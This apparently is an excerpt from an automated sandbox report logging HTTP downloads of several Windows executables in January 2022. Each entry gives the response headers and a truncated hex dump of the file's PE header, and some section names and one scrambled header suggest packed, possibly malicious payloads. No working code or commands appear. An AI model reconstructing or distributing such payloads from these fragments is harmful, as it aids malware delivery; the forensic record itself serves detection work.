                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:15 GMTContent-Type: application/x-msdos-programContent-Length: 294400Connection: closeLast-Modified: Thu, 13 Jan 2022 23:15:01 GMTETag: "47e00-5d57edb175f56"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 6c 2c 39 61 0d 42 6a 61 0d 42 6a 61 0d 42 6a 7f 5f d7 6a 7c 0d 42 6a 7f 5f c1 6a e2 0d 42 6a 7f 5f c6 6a 4f 0d 42 6a 46 cb 39 6a 62 0d 42 6a 61 0d 43 6a e8 0d 42 6a 7f 5f c8 6a 60 0d 42 6a 7f 5f d6 6a 60 0d 42 6a 7f 5f d3 6a 60 0d 42 6a 52 69 63 68 61 0d 42 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ac 0b a4 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 da 03 00 00 00 00 00 60 33 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 97 fa 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 80 01 00 28 00 00 00 00 20 04 00 88 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 73 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 1f 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 59 00 00 00 30 01 00 00 5a 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 82 02 00 00 90 01 00 00 22 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 dc 00 00 00 20 04 00 00 de 00 00 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:20 GMTContent-Type: application/x-msdos-programContent-Length: 327680Connection: closeLast-Modified: Thu, 13 Jan 2022 23:15:02 GMTETag: "50000-5d57edb2597f5"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 6c 2c 39 61 0d 42 6a 61 0d 42 6a 61 0d 42 6a 7f 5f d7 6a 7c 0d 42 6a 7f 5f c1 6a e2 0d 42 6a 7f 5f c6 6a 4f 0d 42 6a 46 cb 39 6a 62 0d 42 6a 61 0d 43 6a e8 0d 42 6a 7f 5f c8 6a 60 0d 42 6a 7f 5f d6 6a 60 0d 42 6a 7f 5f d3 6a 60 0d 42 6a 52 69 63 68 61 0d 42 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 2c 8f 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 5c 04 00 00 00 00 00 60 33 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 05 00 00 04 00 00 77 8a 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 80 01 00 28 00 00 00 00 a0 04 00 88 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 73 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 1f 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 59 00 00 00 30 01 00 00 5a 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 04 03 00 00 90 01 00 00 a4 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 dc 00 00 00 a0 04 00 00 de 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:51 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:15:57 GMTContent-Type: application/x-msdos-programContent-Length: 373760Connection: closeLast-Modified: Wed, 12 Jan 2022 08:30:43 GMTETag: "5b400-5d55e62ba577e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6c cb d2 55 28 aa bc 06 28 aa bc 06 28 aa bc 06 36 f8 29 06 31 aa bc 06 36 f8 3f 06 57 aa bc 06 0f 6c c7 06 2b aa bc 06 28 aa bd 06 f5 aa bc 06 36 f8 38 06 11 aa bc 06 36 f8 28 06 29 aa bc 06 36 f8 2d 06 29 aa bc 06 52 69 63 68 28 aa bc 06 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 61 a2 52 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 c2 04 00 00 76 12 00 00 00 00 00 40 a1 02 00 00 10 00 00 00 e0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 e2 26 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 be 04 00 28 00 00 00 00 b0 16 00 10 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 17 00 14 1d 00 00 80 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 c1 04 00 00 10 00 00 00 c2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 9f 11 00 00 e0 04 00 00 18 00 00 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 69 7a 69 00 00 00 05 00 00 00 00 80 16 00 00 02 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 75 72 00 00 00 00 ea 00 00 00 00 90 16 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 6f 62 00 00 00 00 93 0d 00 00 00 a0 16 00 00 0e 00 00 00 e2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 7b 00 00 00 b0 16 00 00 7c 00 00 00 f0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 46 00 00 00 30 17 00 00 48 00 00 00 6c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:15:59 GMTContent-Type: application/octet-streamContent-Length: 356864Last-Modified: Thu, 13 Jan 2022 20:50:05 GMTConnection: keep-aliveETag: "61e0907d-57200"Expires: Thu, 20 Jan 2022 23:15:59 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5c 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 f4 15 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 15 04 00 00 90 01 00 00 16 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:06 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:08 GMTContent-Type: application/octet-streamContent-Length: 357376Last-Modified: Thu, 13 Jan 2022 19:33:07 GMTConnection: keep-aliveETag: "61e07e73-57400"Expires: Thu, 20 Jan 2022 23:16:08 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 44 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 16 04 00 00 90 01 00 00 18 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:09 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 